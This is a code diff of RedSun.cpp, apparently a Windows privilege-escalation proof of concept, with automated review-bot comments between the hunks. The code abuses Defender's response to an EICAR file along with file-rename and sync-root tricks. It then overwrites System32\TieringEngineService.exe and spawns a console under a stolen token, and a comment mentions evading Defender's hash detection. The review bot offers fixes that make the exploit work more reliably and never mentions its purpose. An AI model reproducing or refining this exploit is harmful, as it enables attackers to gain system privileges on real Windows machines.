diff --git a/RedSun.cpp b/RedSun.cpp
index e44207d..ffed46e 100644
--- a/RedSun.cpp
+++ b/RedSun.cpp
@@ -5,13 +5,15 @@
 // Windows Defender from picking up on it just because of its
 // hash.
-#define _CRT_SECURE_NO_WARNINGS
-#include
-#include
-#include
-#include
-#include
-#include
+#define _CRT_SECURE_NO_WARNINGS
+#define WIN32_NO_STATUS
+#include
+#include
+#undef WIN32_NO_STATUS
+#include
+#include
+#include
+#include
 #pragma comment(lib,"synchronization.lib")
 #pragma comment(lib,"sas.lib")
@@ -73,8 +75,8 @@ typedef struct _REPARSE_DATA_BUFFER {
-HMODULE h = LoadLibrary(L"ntdll.dll");
-HMODULE hm = GetModuleHandle(L"ntdll.dll");
+HMODULE h = LoadLibraryW(L"ntdll.dll");
+HMODULE hm = GetModuleHandleW(L"ntdll.dll");
 NTSTATUS(WINAPI* _NtOpenDirectoryObject)(
 PHANDLE DirectoryHandle,
 ACCESS_MASK DesiredAccess,
@@ -518,7 +520,7 @@ void DoCloudStuff(wchar_t* syncroot, wchar_t* filename, DWORD filesz = 0x1000)
 void LaunchConsoleInSessionId()
 {
- HANDLE hpipe = CreateFile(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+ HANDLE hpipe = CreateFileW(L"\\??\\pipe\\REDSUN", GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 if (hpipe == INVALID_HANDLE_VALUE) return;
 DWORD sessionid = 0;
@@ -541,9 +543,9 @@ void LaunchConsoleInSessionId()
 return;
 }
- STARTUPINFO si = { 0 };
+ STARTUPINFOW si = { 0 };
 PROCESS_INFORMATION pi = { 0 };
- CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
+ CreateProcessAsUserW(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
 CloseHandle(hnewtoken);
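Review bot: The rewritten CreateFileW call in the @@ -518 hunk still passes `NULL` for its third argument, dwShareMode, which is a DWORD and reads as if a pointer were expected; since the commit is already tidying these calls, pass `0` for integer arguments. The same NULL-for-integer pattern appears in the CreateNamedPipeW and CreateThread lines of the @@ -591 and @@ -605 hunks. LaunchConsoleInSessionId continues past the end of this hunk.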
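Review bot: In the @@ -541 hunk, `STARTUPINFOW si = { 0 };` leaves `si.cb` at zero, while CreateProcessAsUserW requires it to hold the structure size; write `STARTUPINFOW si = { sizeof si };`. The return value of CreateProcessAsUserW is not checked, and within the visible lines only hnewtoken is closed, so `pi.hProcess` and `pi.hThread` appear to be leaked on success — if they are not closed further down, add `if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) CloseHandle(pi.hThread);` after the CloseHandle(hnewtoken) line. LaunchConsoleInSessionId begins and ends outside this hunk.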
@@ -591,12 +593,12 @@ void LaunchTierManagementEng()
 int main()
 {
- HANDLE hpipe = CreateNamedPipe(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL);
+ HANDLE hpipe = CreateNamedPipeW(L"\\??\\pipe\\REDSUN", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, NULL, 1, NULL, NULL, NULL,NULL);
 if (hpipe == INVALID_HANDLE_VALUE) return 1;
 wchar_t workdir[MAX_PATH] = { 0 };
- ExpandEnvironmentStrings(L"%TEMP%\\RS-", workdir, MAX_PATH);
+ ExpandEnvironmentStringsW(L"%TEMP%\\RS-", workdir, MAX_PATH);
 GUID uid = { 0 };
 wchar_t wuid[100] = { 0 };
@@ -605,17 +607,17 @@ int main()
 wcscat(workdir, wuid);
 wchar_t filename[] = L"TieringEngineService.exe";
 wchar_t foo[MAX_PATH];
- wsprintf(foo, L"%ws\\%ws", workdir, filename);
+ wsprintfW(foo, L"%ws\\%ws", workdir, filename);
 DWORD tid = 0;
 HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)ShadowCopyFinderThread, foo, NULL, &tid);
- if (!CreateDirectory(workdir, NULL))
+ if (!CreateDirectoryW(workdir, NULL))
 {
 printf("Failed to create workdir");
 return 1;
 }
- HANDLE hfile = CreateFile(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+ HANDLE hfile = CreateFileW(foo, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 if (hfile == INVALID_HANDLE_VALUE)
 {
 printf("Failed create spoof work file.\n");
@@ -627,7 +629,7 @@ int main()
 WriteFile(hfile, eicar, sizeof(eicar) - 1, &nwf, NULL);
 // trigger AV response
- CreateFile(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+ CreateFileW(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 if (WaitForSingleObject(gevent, 120000) != WAIT_OBJECT_0)
 {
 printf("PoC timed out, is real time protection enabled ?");
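Review bot: In the @@ -605 hunk, `wsprintfW(foo, L"%ws\\%ws", workdir, filename);` takes no destination size; wsprintf stops only at its own 1024-character limit, which is larger than `foo[MAX_PATH]`, so a long `%TEMP%` plus the suffix appended by the preceding wcscat can overrun the stack buffer. Prefer a bounded formatter such as `StringCchPrintfW(foo, MAX_PATH, L"%s\\%s", workdir, filename);` (strsafe.h), and apply the same to the two `wsprintfW(_tmp, ...)` calls in the @@ -656 and @@ -689 hunks, whose `_tmp[MAX_PATH]` has the same limit. The format strings are also inconsistent — `%ws` here, `%s` in the later hunks — and with the W entry point both denote a wide string, so one spelling should be used throughout. main() continues beyond this hunk.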
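Review bot: In the @@ -627 hunk the handle returned by `CreateFileW(foo, GENERIC_READ | FILE_EXECUTE, ...)` is discarded, so on success it stays open until the process exits and a failed open is invisible. Capture and release it: `HANDLE hprobe = CreateFileW(foo, GENERIC_READ | FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);` followed by `if (hprobe != INVALID_HANDLE_VALUE) CloseHandle(hprobe);`. If holding the handle open is intentional, say so in the `// trigger AV response` comment so the next reader does not "fix" it. main() continues beyond this hunk.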
@@ -656,9 +658,9 @@ int main()
 InitializeObjectAttributes(&_objattr, &_foo, OBJ_CASE_INSENSITIVE, NULL, NULL);
 wchar_t _tmp[MAX_PATH] = { 0 };
- wsprintf(_tmp, L"\\??\\%s.TMP", workdir);
- MoveFileEx(workdir,_tmp,MOVEFILE_REPLACE_EXISTING);
- if (!CreateDirectory(workdir, NULL))
+ wsprintfW(_tmp, L"\\??\\%s.TMP", workdir);
+ MoveFileExW(workdir, _tmp, MOVEFILE_REPLACE_EXISTING);
+ if (!CreateDirectoryW(workdir, NULL))
 {
 printf("Failed to re-create directory.\n");
 return 1;
@@ -689,7 +691,7 @@ int main()
 {
 wchar_t _tmp[MAX_PATH] = { 0 };
- wsprintf(_tmp, L"\\??\\%s.TEMP2", workdir);
+ wsprintfW(_tmp, L"\\??\\%s.TEMP2", workdir);
 PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
 ZeroMemory(pfri, sizeof(FILE_RENAME_INFORMATION) + (sizeof(wchar_t) * wcslen(_tmp)));
@@ -768,10 +770,10 @@ int main()
 wchar_t mx[MAX_PATH] = { 0 };
- GetModuleFileName(GetModuleHandle(NULL), mx, MAX_PATH);
+ GetModuleFileNameW(GetModuleHandleW(NULL), mx, MAX_PATH);
 wchar_t mx2[MAX_PATH] = { 0 };
- ExpandEnvironmentStrings(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH);
- CopyFile(mx, mx2, FALSE);
+ ExpandEnvironmentStringsW(L"%WINDIR%\\System32\\TieringEngineService.exe", mx2, MAX_PATH);
+ CopyFileW(mx, mx2, FALSE);
 LaunchTierManagementEng();
 Sleep(2000);
 CloseHandle(hpipe);
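Review bot: In the @@ -689 hunk, `pfri` comes from `malloc` and is handed straight to `ZeroMemory` without a NULL check, and the size expression is spelled out twice, which invites the two copies drifting apart. Compute it once and use calloc so the zeroing and the check come together: `size_t sz = sizeof(FILE_RENAME_INFORMATION) + sizeof(wchar_t) * wcslen(_tmp);` then `PFILE_RENAME_INFORMATION pfri = (PFILE_RENAME_INFORMATION)calloc(1, sz);` and `if (!pfri) return 1;`, matching the `return 1` failure style used elsewhere in main. The block that uses pfri, and main() itself, continue outside this hunk.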